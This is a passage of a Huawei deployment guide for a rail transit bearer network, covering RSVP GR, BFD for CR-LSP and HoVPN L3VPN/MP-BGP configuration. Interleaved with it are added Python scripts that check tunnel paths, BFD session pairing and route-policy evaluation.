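The three checks described above (both LSPs UP, traffic on the primary LSP, primary and backup paths different) can be automated over the CLI output. The following Python script is an added example and is not part of the Huawei document: it parses constructed copies of the display mpls te tunnel-interface and tracert lsp te output shown above for Tunnel611 and reports any check that fails. The field names it looks for are the ones visible in the output above; the exact column layout of the constructed samples is an assumption.

```python
"""Check a hot-standby TE tunnel from CLI output: both LSPs UP, traffic on the
primary, and primary/backup paths disjoint (the three checks described above)."""
import re

# Constructed sample output, shaped like the Tunnel611 output shown above.
TUNNEL_INTERFACE_OUTPUT = """\
----------------------------------------------------------------
                    Tunnel611
----------------------------------------------------------------
Tunnel State Desc     : UP
Active LSP            : Primary LSP
Session ID            : 71
Ingress LSR ID        : 172.16.0.5        Egress LSR ID: 172.16.2.51
Admin State           : UP                Oper State   : UP
Primary LSP State     : UP
  Main LSP State      : READY             LSP ID       : 1
Hot-Standby LSP State : UP
  Main LSP State      : READY             LSP ID       : 32772
"""
TRACERT_PRIMARY = """\
TTL  Replier            Time    Type      Downstream
0                               Ingress   172.17.4.11/[1078 ]
1    172.16.2.51        3 ms    Egress
"""
TRACERT_HOT_STANDBY = """\
TTL  Replier            Time    Type      Downstream
0                               Ingress   172.17.4.9/[1391 ]
1    172.17.4.9         3 ms    Transit   172.17.4.13/[1169 ]
2    172.17.4.13        7 ms    Transit   172.17.4.14/[1109 ]
3    172.16.2.51        4 ms    Egress
"""
IPV4 = r"\d+(?:\.\d+){3}"


def parse_tunnel_interface(text):
    """Return the 'key : value' fields; one line may carry two of them."""
    fields = {}
    for line in text.splitlines():
        for key, value in re.findall(r"([A-Za-z][A-Za-z \-]*?)\s*:\s*(\S+(?: \S+)*)", line):
            fields[key.strip()] = value
    return fields


def parse_tracert(text):
    """Return (downstream address at the ingress, [replier addresses in TTL order])."""
    first_hop, repliers = None, []
    for line in text.splitlines():
        ingress = re.match(r"\s*0\s+Ingress\s+(" + IPV4 + ")", line)
        if ingress:
            first_hop = ingress.group(1)
            continue
        parts = line.split()
        if len(parts) >= 2 and parts[0].isdigit() and re.fullmatch(IPV4, parts[1]):
            repliers.append(parts[1])
    return first_hop, repliers


def check_hot_standby(tunnel_text, primary_trace, backup_trace):
    """Return a list of findings; an empty list means all checks passed."""
    fields = parse_tunnel_interface(tunnel_text)
    findings = []
    for key in ("Primary LSP State", "Hot-Standby LSP State"):
        if fields.get(key) != "UP":
            findings.append(f"{key} is {fields.get(key)}, expected UP")
    if fields.get("Active LSP") != "Primary LSP":
        findings.append(f"active LSP is {fields.get('Active LSP')}, expected Primary LSP")
    p_first, p_path = parse_tracert(primary_trace)
    b_first, b_path = parse_tracert(backup_trace)
    # Both LSPs must terminate on the tunnel's egress LSR ...
    egress = fields.get("Egress LSR ID")
    for name, path in (("primary", p_path), ("backup", b_path)):
        if not path or path[-1] != egress:
            findings.append(f"{name} LSP does not end on egress {egress}")
    # ... but must not share the first hop or any transit node: a shared node is a
    # single point of failure that takes down both paths and defeats hot standby.
    shared = set(p_path[:-1]) & set(b_path[:-1])
    if p_first == b_first or shared:
        findings.append(f"primary and backup share the path: first hop {p_first}, transit {sorted(shared)}")
    return findings


if __name__ == "__main__":
    print(check_hot_standby(TUNNEL_INTERFACE_OUTPUT, TRACERT_PRIMARY, TRACERT_HOT_STANDBY) or "hot standby OK")
```

Feeding the script the same tracert output for both the primary and the hot-standby LSP makes it report a shared first hop, which is the condition the "ensure that the primary and backup tunnel paths are different" step is meant to catch.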

2.5.5.4 Configuring RSVP GR

Procedure
l Configure SPEs.
The following uses the configuration of Core_SPE1 on the core ring as an example. The
configurations of Core_SPE2 and Core_SPE3 are similar to the configuration of
Core_SPE1, and are not mentioned here.
mpls
mpls rsvp-te hello //Enable the RSVP Hello extension mechanism globally.
mpls rsvp-te hello full-gr //Enable the RSVP GR and RSVP GR Helper
capabilities.
#
interface Eth-Trunk4
mpls rsvp-te hello //Enable the RSVP Hello extension mechanism on an
interface.
#
interface Eth-Trunk5
mpls rsvp-te hello
#
interface Eth-Trunk17
mpls rsvp-te hello
#
interface XGigabitEthernet6/0/4
mpls rsvp-te hello
#

l Configure UPEs.
The following uses the configuration of Site1_UPE1 as an example. The configurations
of Site1_UPE2, Site2_UPE3, Site2_UPE4, Site3_UPE5, and Site3_UPE6 are similar to
the configuration of Site1_UPE1, and are not mentioned here.
mpls
mpls rsvp-te hello //Enable the RSVP Hello extension mechanism globally.
mpls rsvp-te hello full-gr //Enable the RSVP GR and RSVP GR Helper
capabilities.
#
interface Eth-Trunk7
mpls rsvp-te hello //Enable the RSVP Hello extension mechanism on an
interface.
#
interface Eth-Trunk17
mpls rsvp-te hello
#

----End


2.5.5.5 Configuring BFD for CR-LSP

Procedure
l Configure SPEs.
The following uses the configuration of Core_SPE1 on the core ring as an example. The
configurations of Core_SPE2 and Core_SPE3 are similar to the configuration of
Core_SPE1, and are not mentioned here.
bfd SPE1toUPE1_b bind mpls-te interface Tunnel611 te-lsp backup //Enable
static BFD to detect the backup CR-LSP of TE tunnel 611.
discriminator local 6116 //Set the local discriminator. The local
discriminator of the local system must be the same as the remote
discriminator of the remote system.
discriminator remote 6115 //Set the remote discriminator.
detect-multiplier 8 //Set the local detection multiplier of BFD.
min-tx-interval 3 //Set the minimum interval at which the local device
sends BFD packets to 3.3 ms.
min-rx-interval 3 //Set the minimum interval at which the local device
receives BFD packets to 3.3 ms.
process-pst //Allow BFD sessions to change the PST to speed up switchovers.
commit //Commit the BFD session configuration.
#
bfd SPE1toUPE1_m bind mpls-te interface Tunnel611 te-lsp //Enable static
BFD to detect the primary CR-LSP of TE tunnel 611.
discriminator local 6112
discriminator remote 6111
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE1toUPE2_b bind mpls-te interface Tunnel622 te-lsp backup //Enable
static BFD to detect the backup CR-LSP of TE tunnel 622.
discriminator local 6226
discriminator remote 6225
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE1toUPE2_m bind mpls-te interface Tunnel622 te-lsp //Enable static
BFD to detect the primary CR-LSP of TE tunnel 622.
discriminator local 6222
discriminator remote 6221
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE1toUPE5_b bind mpls-te interface Tunnel721 te-lsp backup //Enable
static BFD to detect the backup CR-LSP of TE tunnel 721.
discriminator local 7216
discriminator remote 7215
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE1toUPE5_m bind mpls-te interface Tunnel721 te-lsp //Enable static
BFD to detect the primary CR-LSP of TE tunnel 721.
discriminator local 7212
discriminator remote 7211


detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE1toUPE6_b bind mpls-te interface Tunnel711 te-lsp backup //Enable
static BFD to detect the backup CR-LSP of TE tunnel 711.
discriminator local 7116
discriminator remote 7115
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE1toUPE6_m bind mpls-te interface Tunnel711 te-lsp //Enable static
BFD to detect the primary CR-LSP of TE tunnel 711.
discriminator local 7112
discriminator remote 7111
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
l Configure UPEs.
The following uses the configuration of Site1_UPE1 as an example. The configurations
of Site1_UPE2, Site2_UPE3, Site2_UPE4, Site3_UPE5, and Site3_UPE6 are similar to
the configuration of Site1_UPE1, and are not mentioned here.
bfd UPE1toSPE1_m_b bind mpls-te interface Tunnel611 te-lsp backup //Enable
static BFD to detect the backup CR-LSP of TE tunnel 611.
discriminator local 6115 //Set the local discriminator. The local
discriminator of the local system must be the same as the remote
discriminator of the remote system.
discriminator remote 6116 //Set the remote discriminator.
detect-multiplier 8 //Set the local detection multiplier of BFD.
min-tx-interval 3 //Set the minimum interval at which the local device
sends BFD packets to 3.3 ms.
min-rx-interval 3 //Set the minimum interval at which the local device
receives BFD packets to 3.3 ms.
process-pst //Allow BFD sessions to change the PST to speed up switchovers.
commit //Commit the BFD session configuration.
#
bfd UPE1toSPE1_m bind mpls-te interface Tunnel611 te-lsp //Enable static
BFD to detect the primary CR-LSP of TE tunnel 611.
discriminator local 6111
discriminator remote 6112
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE1toSPE2_b bind mpls-te interface Tunnel612 te-lsp backup //Enable
static BFD to detect the backup CR-LSP of TE tunnel 612.
discriminator local 6125
discriminator remote 6126
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE1toSPE2_m bind mpls-te interface Tunnel612 te-lsp //Enable static
BFD to detect the primary CR-LSP of TE tunnel 612.
discriminator local 6121
discriminator remote 6122
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#

----End

Checking the Configuration


l Run the display bfd session all for-te command to view the BFD session status.
Using Core_SPE1 as an example, if BFD sessions with the tunnel type being S_TE_LSP
are all in Up state, BFD sessions have been set up successfully.
[Core_SPE1]display bfd session all for-te
--------------------------------------------------------------------------------
Local   Remote   PeerIpAddr      State   Type       InterfaceName
--------------------------------------------------------------------------------
7112    7111     172.16.2.86     Up      S_TE_LSP   Tunnel711
7212    7211     172.16.2.87     Up      S_TE_LSP   Tunnel721
7216    7215     172.16.2.87     Up      S_TE_LSP   Tunnel721
7116    7115     172.16.2.86     Up      S_TE_LSP   Tunnel711
6226    6225     172.16.2.50     Up      S_TE_LSP   Tunnel622
6116    6115     172.16.2.51     Up      S_TE_LSP   Tunnel611
6112    6111     172.16.2.51     Up      S_TE_LSP   Tunnel611
6222    6221     172.16.2.50     Up      S_TE_LSP   Tunnel622
--------------------------------------------------------------------------------
Total UP/DOWN Session Number : 8/0
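The discriminator pairing and timer values in the procedure above are easy to get wrong when the same session is typed in on two devices by hand. The following Python script is an added example, not part of the Huawei document: it parses constructed copies of the Core_SPE1 and Site1_UPE1 BFD configurations for Tunnel611, verifies that each local discriminator is mirrored by the remote discriminator on the far end, checks the sessions against a constructed display bfd session all for-te output, and computes the resulting BFD detection time. The mapping of the configured interval value 3 to 3.3 ms is taken from the configuration comments above; treating other values as plain milliseconds and the use of the RFC 5880 detection-time formula are assumptions of this example.

```python
"""Cross-check the static BFD-for-CR-LSP sessions on both ends of a TE tunnel against
each other and against 'display bfd session all for-te', and compute detection time."""
import re

# Constructed samples shaped like the Core_SPE1 and Site1_UPE1 configurations above
# (only the two Tunnel611 sessions of each side) and the display output above.
SPE1_BFD = """\
bfd SPE1toUPE1_b bind mpls-te interface Tunnel611 te-lsp backup
 discriminator local 6116
 discriminator remote 6115
 detect-multiplier 8
 min-tx-interval 3
 min-rx-interval 3
#
bfd SPE1toUPE1_m bind mpls-te interface Tunnel611 te-lsp
 discriminator local 6112
 discriminator remote 6111
 detect-multiplier 8
 min-tx-interval 3
 min-rx-interval 3
#
"""
UPE1_BFD = """\
bfd UPE1toSPE1_m_b bind mpls-te interface Tunnel611 te-lsp backup
 discriminator local 6115
 discriminator remote 6116
 detect-multiplier 8
 min-tx-interval 3
 min-rx-interval 3
#
bfd UPE1toSPE1_m bind mpls-te interface Tunnel611 te-lsp
 discriminator local 6111
 discriminator remote 6112
 detect-multiplier 8
 min-tx-interval 3
 min-rx-interval 3
#
"""
SPE1_DISPLAY = """\
Local  Remote  PeerIpAddr   State  Type      InterfaceName
6116   6115    172.16.2.51  Up     S_TE_LSP  Tunnel611
6112   6111    172.16.2.51  Up     S_TE_LSP  Tunnel611
"""


def interval_ms(value):
    """The configuration comments above state that the value 3 stands for 3.3 ms;
    treating any other value as plain milliseconds is an assumption of this example."""
    return 3.3 if value == 3 else float(value)


def parse_bfd_sessions(config):
    """Map (tunnel interface, 'primary'|'backup') -> the session's numeric parameters."""
    sessions, current = {}, None
    for raw in config.splitlines():
        line = raw.strip()
        head = re.match(r"bfd (\S+) bind mpls-te interface (\S+) te-lsp( backup)?$", line)
        if head:
            current = {"name": head.group(1)}
            sessions[(head.group(2), "backup" if head.group(3) else "primary")] = current
        elif line == "#":
            current = None
        elif current is not None:
            kv = re.match(r"(?:discriminator )?([a-z-]+) (\d+)$", line)
            if kv:  # process-pst and commit carry no value and are skipped
                current[kv.group(1)] = int(kv.group(2))
    return sessions


def check_pair(near, far):
    """Each session's local/remote discriminators must be the far end's remote/local."""
    findings = []
    for key, a in near.items():
        b = far.get(key)
        if b is None:
            findings.append(f"{key}: no session configured on the far end")
        elif (a["local"], a["remote"]) != (b["remote"], b["local"]):
            findings.append(f"{key}: {a['local']}/{a['remote']} does not mirror {b['local']}/{b['remote']}")
    return findings


def detection_time_ms(near, far):
    """Time 'near' needs to declare the session down once 'far' stops sending (RFC 5880):
    far's detect multiplier times the negotiated interval, which is the larger of near's
    min-rx-interval and far's min-tx-interval."""
    negotiated = max(interval_ms(near["min-rx-interval"]), interval_ms(far["min-tx-interval"]))
    return round(far["detect-multiplier"] * negotiated, 1)


def check_display(display, sessions):
    """Every configured session must appear as Up / S_TE_LSP on its tunnel interface."""
    seen = {}
    for line in display.splitlines()[1:]:
        local, remote, _peer, state, kind, ifname = line.split()
        seen[(int(local), int(remote))] = (state, kind, ifname)
    return [f"{ifname} {lsp}: expected Up S_TE_LSP, got {seen.get((s['local'], s['remote']))}"
            for (ifname, lsp), s in sessions.items()
            if seen.get((s["local"], s["remote"])) != ("Up", "S_TE_LSP", ifname)]


if __name__ == "__main__":
    spe, upe = parse_bfd_sessions(SPE1_BFD), parse_bfd_sessions(UPE1_BFD)
    print(check_pair(spe, upe) + check_pair(upe, spe) + check_display(SPE1_DISPLAY, spe) or "BFD OK")
    print("detection time on Core_SPE1:", detection_time_ms(spe[("Tunnel611", "primary")], upe[("Tunnel611", "primary")]), "ms")
```

With the values above (multiplier 8, intervals 3.3 ms on both sides) the detection time comes out at 26.4 ms per direction, which is the budget a CR-LSP failure has before BFD changes the PST and triggers the hot-standby switchover.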

2.5.6 Deploying L3VPN Services and Protection (HoVPN)


This section describes how to deploy L3VPN services in HoVPN mode and use TE tunnels to
bear the services.

2.5.6.1 Configuration Roadmap

On a rail transit bearer network, IP tunnels between nodes need to be enabled to bear
L3VPN services. For example, set up a hierarchical L3VPN tunnel from Site1_UPE1 to
Site2_UPE3 to transmit IP data services between Site1 and Site2, as shown in Figure 2-19.


Figure 2-19 Hierarchical L3VPN

[Figure not reproduced in this text version. It shows CE1, CE2 and CE3 (all in vpna) at
Site1, Site2 and Site3, connected through Site1_UPE1/Site1_UPE2, Site2_UPE3/Site2_UPE4 and
Site3_UPE5/Site3_UPE6 to Core_SPE1, Core_SPE2 and Core_SPE3 over L3VPN. Labels in the figure:
Primary path for traffic of vpna, VPN FRR (on the UPEs and SPEs), IP+VPN hybrid FRR (between
Site2_UPE3 and Site2_UPE4), Specific route, Default route, L3VPN.]

The configuration roadmap is as follows:


1. Deploy MP-BGP.
– Set up MP-IBGP peer relationships between UPEs and SPEs and between SPEs.
– Configure routing rules so that traffic from UPEs to SPEs is forwarded through
the default route and traffic from SPEs to UPEs is forwarded through specific
routes.
– Configure route priority policies to enable UPEs to forward traffic to other sites
preferentially through SPEs directly connected to the UPEs.
– Configure route priority policies to enable SPEs to forward traffic to other sites
preferentially through UPEs directly connected to the SPEs.
– Configure route filtering policies to prevent SPEs from advertising ARP Vlink
direct routes at the local sites to UPEs at other sites.
– Configure route filtering policies to prevent SPEs from receiving, from other SPEs,
route information about sites directly connected to them, which prevents routing loops.
For example, prevent Core_SPE2 from receiving routes of Site1 from Core_SPE1 and
routes of Site2 from Core_SPE3.
2. Deploy VPN services.
– Deploy VPN instances on UPEs and SPEs, and bind interfaces to the VPN instances
on UPEs, but not on SPEs.
– Preferentially use TE tunnels to bear VPN services on UPEs. In hybrid FRR mode,
LSP tunnels can be used to bear VPN services.


– Configure a tunnel policy selector on an SPE to enable the SPE to select any tunnel
policy when the next-hop address of a VPNv4 route has the prefix of another SPE
and to select a TE tunnel in other scenarios.
– Deploy VRRP on two UPEs at a site, and send information about ARP Vlink direct
routes to the neighboring SPEs so that the SPEs select the optimal route to send
packets to the CE.
3. Configure reliability protection.
– Deploy VRRP on two UPEs at a site to implement gateway backup and ensure
reliability of uplink traffic on CEs. Configure backup devices to forward service
traffic, minimizing the impact of VRRP switchovers on services.
– Deploy VPN FRR on a UPE. If the TE tunnel between the UPE and an SPE is
faulty, traffic is automatically switched to the TE tunnel between the UPE and
another SPE at the same site, minimizing the impact on VPN services.
– Deploy VPN FRR on an SPE, for example Core_SPE1. If Core_SPE2 connected to
SPE1 is faulty, Core_SPE1 switches VPN services to Core_SPE3, implementing
fast E2E switchovers of VPN services.
– Deploy VPN FRR on an SPE. If the TE tunnel between the SPE and a UPE is
faulty, traffic is automatically switched to the TE tunnel between the SPE and
another UPE at the same site, minimizing the impact on VPN services.
– Deploy IP+VPN hybrid FRR on UPEs. If the interface of a UPE detects a fault on
the link between the UPE and its connected CE, the UPE quickly switches traffic to
its peer UPE, and the peer UPE then forwards the traffic to the CE.
– Deploy VPN GR on all UPEs and SPEs to ensure uninterrupted VPN traffic
forwarding during a master/backup switchover on the device transmitting VPN
services.

2.5.6.2 Data Plan

NOTE

The data provided in this section is used as an example, which may vary depending on the network scale and
topology.

Table 2-21 Service interfaces

NE           Role        Value                                           Remarks

Site1_UPE1   interface   XGigabitEthernet1/0/4.200: 172.18.200.66/26     -

Site1_UPE2   interface   XGigabitEthernet1/0/4.200: 172.18.200.67/26     -

Site2_UPE3   interface   XGigabitEthernet0/0/2.150: 172.18.150.2/26      -

Site2_UPE4   interface   XGigabitEthernet0/0/2.150: 172.18.150.3/26      -

Site3_UPE5   interface   XGigabitEthernet0/0/2.100: 172.18.100.2/26      -

Site3_UPE6   interface   XGigabitEthernet0/0/2.100: 172.18.100.3/26      -

Table 2-22 MPLS VPN parameters

Parameter           Value            Remarks

VPN instance name   vpna             -

RD value            UPE: 1:1         It is recommended that the same RD value be set on UPEs and
                    Core_SPE1: 5:1   SPEs. If different RD values are set, to make VPN FRR take
                    Core_SPE2: 3:1   effect, you need to run the vpn-route cross multipath command
                    Core_SPE3: 4:1   to add multiple VPNv4 routes to a VPN instance with a
                                     different RD value from these routes' RD values.

RT                  0:1              Plan the same RT on the entire network.

Table 2-23 BGP parameters

BGP process ID: 65000 on all devices. policy vpn-target: Enable on all devices.
Tunnel policy selector: Deploy on Core_SPE1, Core_SPE2 and Core_SPE3; - on the UPEs.

Device       Router ID     Peer group devCore        Peer group devHost                                   Peer priority

Core_SPE1    172.16.0.5    172.16.0.3, 172.16.0.4    172.16.2.50, 172.16.2.51, 172.16.2.86, 172.16.2.87   -
Core_SPE2    172.16.0.3    172.16.0.4, 172.16.0.5    172.16.2.50, 172.16.2.51, 172.16.2.75, 172.16.2.76   -
Core_SPE3    172.16.0.4    172.16.0.3, 172.16.0.5    172.16.2.75, 172.16.2.76, 172.16.2.86, 172.16.2.87   -
Site1_UPE1   172.16.2.51   172.16.0.3, 172.16.0.5    172.16.2.50                                          Core_SPE1
Site1_UPE2   172.16.2.50   172.16.0.3, 172.16.0.5    172.16.2.51                                          Core_SPE2
Site2_UPE3   172.16.2.75   172.16.0.3, 172.16.0.4    172.16.2.76                                          Core_SPE2
Site2_UPE4   172.16.2.76   172.16.0.3, 172.16.0.4    172.16.2.75                                          Core_SPE3
Site3_UPE5   172.16.2.87   172.16.0.4, 172.16.0.5    172.16.2.86                                          Core_SPE3
Site3_UPE6   172.16.2.86   172.16.0.4, 172.16.0.5    172.16.2.87                                          Core_SPE1

Peer priority (UPEs only): improve the peer priority of the listed SPE so that the UPE
preferentially selects routes advertised from that SPE.


2.5.6.3 Configuring MP-BGP

BGP Connection Diagram

[Figure not reproduced in this text version. It shows the BGP peer relationships among
Core_SPE1, Core_SPE2, Core_SPE3 and the six UPEs (Site1_UPE1, Site1_UPE2, Site2_UPE3,
Site2_UPE4, Site3_UPE5, Site3_UPE6), with CE1, CE2 and CE3 in vpna. Legend: BGP peers;
n preferred-value (values 200 and 300); Community Attribute (100:100, 200:200, 300:300,
5720:5720, 12:12, 13:13, 23:23).]

Procedure
l Configure SPEs.

The following uses the configuration of Core_SPE1 on the core ring as an example. The
configurations of Core_SPE2 and Core_SPE3 are similar to the configuration of
Core_SPE1, and are not mentioned here.
tunnel-selector TSel permit node 9
if-match ip next-hop ip-prefix core_nhp //Configure a tunnel policy
selector to enable Core_SPE1 to select any tunnel to be iterated when the
next-hop address of a VPNv4 route has the prefix of another SPE.
#
tunnel-selector TSel permit node 10 //Configure a tunnel policy selector to
iterate a route received from an IBGP peer to a TE tunnel when the route
needs to be forwarded to another IBGP peer and Core_SPE1 needs to modify the
next hop of the route to itself.
apply tunnel-policy TE
#
bgp 65000
group devCore internal //Create an IBGP peer group.
peer devCore connect-interface LoopBack1 //Specify loopback interface 1
and its address as the source interface and address of BGP packets.
peer 172.16.0.3 as-number 65000 //Set up a peer relationship between SPEs.
peer 172.16.0.3 group devCore //Add SPEs to the IBGP peer group.
peer 172.16.0.4 as-number 65000
peer 172.16.0.4 group devCore
group devHost internal
peer devHost connect-interface LoopBack1
peer 172.16.2.50 as-number 65000
peer 172.16.2.50 group devHost
peer 172.16.2.51 as-number 65000
peer 172.16.2.51 group devHost
peer 172.16.2.86 as-number 65000
peer 172.16.2.86 group devHost
peer 172.16.2.87 as-number 65000
peer 172.16.2.87 group devHost
#
ipv4-family unicast
undo synchronization
undo peer devCore enable
undo peer devHost enable
undo peer 172.16.2.50 enable
undo peer 172.16.2.51 enable
undo peer 172.16.0.3 enable
undo peer 172.16.0.4 enable
undo peer 172.16.2.86 enable
undo peer 172.16.2.87 enable
#
ipv4-family vpnv4
policy vpn-target
tunnel-selector TSel //An SPE advertises the default route to UPEs. The
SPE modifies the next hop of UPEs' routes to itself and forwards the routes
to other SPEs. Therefore, configure a tunnel policy selector to iterate BGP
VPNv4 routes sent to UPEs to TE tunnels and to iterate BGP VPNv4 routes sent
to other SPEs to LSPs.
peer devCore enable
peer devCore route-policy core-import import //Configure Core_SPE1 to
filter information about all routes of sites connected to Core_SPE1 when it
receives routes from other SPEs.
peer devCore advertise-community
peer 172.16.0.3 enable
peer 172.16.0.3 group devCore
peer 172.16.0.4 enable
peer 172.16.0.4 group devCore
peer devHost enable
peer devHost route-policy p_iBGP_RR_in import //Configure Core_SPE1 to
filter out host routes when receiving routes from UPEs; set the preferred
value of the route between Core_SPE1 and its directly connected UPEs to 300,
and set the preferred value of routes between Core_SPE1 and other UPEs to 200.
peer devHost advertise-community //Advertise community attributes to the
IBGP peer group.
peer devHost upe //Configure the peer devHost as a UPE.
peer devHost default-originate vpn-instance vpna //Send the default route
of VPN instance vpna to UPEs.
peer 172.16.2.50 enable
peer 172.16.2.50 group devHost
peer 172.16.2.51 enable
peer 172.16.2.51 group devHost
peer 172.16.2.86 enable
peer 172.16.2.86 group devHost
peer 172.16.2.87 enable
peer 172.16.2.87 group devHost
#
#
route-policy p_iBGP_RR_in deny node 5 //Filter out host routes of all sites.
if-match ip-prefix deny_host
if-match community-filter all_site
#
route-policy p_iBGP_RR_in permit node 11 //Set the preferred value of the
route between Core_SPE1 and its directly connected UPE to 300.
if-match community-filter site1
apply preferred-value 300
#
route-policy p_iBGP_RR_in permit node 12 //Set the preferred value of the
route between Core_SPE1 and another UPE to 200.
if-match community-filter site2
apply preferred-value 200
#
route-policy p_iBGP_RR_in permit node 13 //Set the preferred value of the
route between Core_SPE1 and another UPE to 200.
if-match community-filter site3
apply preferred-value 200
#
route-policy p_iBGP_RR_in permit node 20 //Permit all the other routes.
#
route-policy core-import deny node 5 //Deny all routes of sites directly
connected to Core_SPE1.
if-match community-filter site12
#
route-policy core-import deny node 6 //Deny all routes of sites directly
connected to Core_SPE1.
if-match community-filter site13
#
route-policy core-import permit node 10 //Permit all the other routes.
#
ip ip-prefix deny_host index 10 permit 0.0.0.0 0 greater-equal 32 less-equal
32 //Permit all 32-bit host routes and deny all the other routes.
ip ip-prefix core_nhp index 10 permit 172.16.0.3 32
ip ip-prefix core_nhp index 20 permit 172.16.0.4 32 //Permit routes to
172.16.0.3/32 and 172.16.0.4/32 and deny all the other routes.
#
ip community-filter basic site1 permit 100:100 //Create a community
attribute filter site1 and set the community attribute to 100:100.
ip community-filter basic site2 permit 200:200
ip community-filter basic site3 permit 300:300
ip community-filter basic all_site permit 5720:5720
ip community-filter basic site12 permit 12:12
ip community-filter basic site13 permit 13:13
#
l Configure UPEs.
The following uses the configuration of Site1_UPE1 as an example. The configurations
of Site1_UPE2, Site2_UPE3, Site2_UPE4, Site3_UPE5, and Site3_UPE6 are similar to
the configuration of Site1_UPE1, and are not mentioned here.
bgp 65000
group devCore internal
peer devCore connect-interface LoopBack1
peer 172.16.0.3 as-number 65000
peer 172.16.0.3 group devCore
peer 172.16.0.5 as-number 65000
peer 172.16.0.5 group devCore
group devHost internal
peer devHost connect-interface LoopBack1
peer 172.16.2.50 as-number 65000
peer 172.16.2.50 group devHost
#
ipv4-family unicast
undo synchronization
undo peer devCore enable
undo peer devHost enable
undo peer 172.16.2.50 enable
undo peer 172.16.0.3 enable
undo peer 172.16.0.5 enable
#
ipv4-family vpnv4
policy vpn-target
peer devCore enable
peer devCore route-policy p_iBGP_host_ex export //Configure the community
attribute of routes that Site1_UPE1 sends to SPEs.
peer devCore advertise-community
peer 172.16.0.3 enable
peer 172.16.0.3 group devCore
peer 172.16.0.3 preferred-value 200 //Set the preferred value of the
route between Site1_UPE1 and Core_SPE2 to 200.
peer 172.16.0.5 enable
peer 172.16.0.5 group devCore
peer 172.16.0.5 preferred-value 300 //Set the priority of Core_SPE1 to
300 so that Site1_UPE1 preferentially selects routes advertised from
Core_SPE1.
peer devHost enable
peer devHost advertise-community
peer 172.16.2.50 enable
peer 172.16.2.50 group devHost
#
#
route-policy p_iBGP_host_ex permit node 0 //Add the community attributes to the route.
apply community 100:100 5720:5720 12:12
#

----End
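The SPE import policies (p_iBGP_RR_in and core-import, reproduced in full in the Core_SPE1 configuration file later in this section) and the UPE export policy p_iBGP_host_ex work together: each UPE tags its routes with a site community (100:100), the all-site community (5720:5720) and a core-pair community (12:12), and the SPEs use those tags to drop /32 host routes, assign a preferred value per site, and stop a core from re-learning the routes of its directly connected sites from the other cores. The following Python script is an added example, not Huawei code: it parses these definitions from configuration text and walks a route through a policy with the node semantics the policies rely on (nodes in ascending order, all if-match clauses of a node ANDed, first matching node decides, implicit deny at the end). The embedded configuration is constructed from the Core_SPE1 policies on this page and trimmed to what is used; only the if-match and apply clause types on this page are implemented, and the script assumes a basic community filter matches when the route carries every community listed on a permit line.

```python
"""Evaluate routes against Huawei-style route-policies parsed from config text.

Added example, not Huawei code. Node semantics implemented: nodes are tried in
ascending order; every if-match in a node must match (AND); the first matching
node decides (deny drops the route, permit applies its actions and accepts); a
route that matches no node is dropped. Assumption: a basic community filter
matches when the route carries every community listed on a permit line.
"""
import ipaddress
import re

# Constructed from the Core_SPE1 policies on this page (trimmed to what is used).
CORE_SPE1_POLICY = """\
route-policy p_iBGP_RR_in deny node 5
 if-match ip-prefix deny_host
 if-match community-filter all_site
#
route-policy p_iBGP_RR_in permit node 11
 if-match community-filter site1
 apply preferred-value 300
#
route-policy p_iBGP_RR_in permit node 20
#
route-policy core-import deny node 5
 if-match community-filter site12
#
route-policy core-import permit node 10
#
ip ip-prefix deny_host index 10 permit 0.0.0.0 0 greater-equal 32 less-equal 32
ip community-filter basic site1 permit 100:100
ip community-filter basic all_site permit 5720:5720
ip community-filter basic site12 permit 12:12
"""

PREFIX_RE = re.compile(r"ip ip-prefix (\S+) index \d+ (permit|deny) (\S+) (\d+)"
                       r"(?: greater-equal (\d+))?(?: less-equal (\d+))?")


def parse_policy_config(text):
    """Return (community_filters, prefix_lists, route_policies) from config text."""
    cf, pl, rp, node = {}, {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "#":
            node = None                      # '#' ends the current node
            continue
        if (m := re.match(r"ip community-filter basic (\S+) permit (.+)", line)):
            cf.setdefault(m[1], []).append(set(m[2].split()))
        elif (m := PREFIX_RE.match(line)):
            name, action, addr, length, ge, le = m.groups()
            length = int(length)
            lo = int(ge) if ge else length   # no range given: exact length only
            hi = int(le) if le else (32 if ge else length)
            pl.setdefault(name, []).append((action, addr, length, lo, hi))
        elif (m := re.match(r"route-policy (\S+) (permit|deny) node (\d+)", line)):
            node = {"action": m[2], "match": [], "apply": []}
            rp.setdefault(m[1], {})[int(m[3])] = node
        elif node is not None and line.startswith(("if-match ", "apply ")):
            node["match" if line.startswith("if-match") else "apply"].append(line.split()[1:])
    return cf, pl, rp


def prefix_list_permits(entries, net):
    """First matching ip-prefix entry decides; no match is an implicit deny."""
    for action, addr, length, lo, hi in entries:
        covering = ipaddress.ip_network(f"{addr}/{length}", strict=False)
        if net.network_address in covering and lo <= net.prefixlen <= hi:
            return action == "permit"
    return False


def evaluate(policy, prefix, communities, cfg):
    """Walk one route through a policy; return (accepted, attributes)."""
    cf, pl, rp = cfg
    net, comms = ipaddress.ip_network(prefix, strict=False), set(communities)
    for seq in sorted(rp[policy]):
        node = rp[policy][seq]
        matched = True
        for clause in node["match"]:
            if clause[0] == "ip-prefix":
                matched = prefix_list_permits(pl[clause[1]], net)
            elif clause[0] == "community-filter":
                matched = any(rule <= comms for rule in cf[clause[1]])
            else:
                raise ValueError(f"unsupported if-match {clause}")
            if not matched:
                break
        if not matched:
            continue
        attrs = {"node": seq}
        if node["action"] == "deny":
            return False, attrs
        for act in node["apply"]:
            if act[0] == "preferred-value":
                attrs["preferred-value"] = int(act[1])
            elif act[0] == "community":
                attrs["community"] = set(act[1:])
        return True, attrs
    return False, {"node": None}             # fell off the end: implicit deny
```

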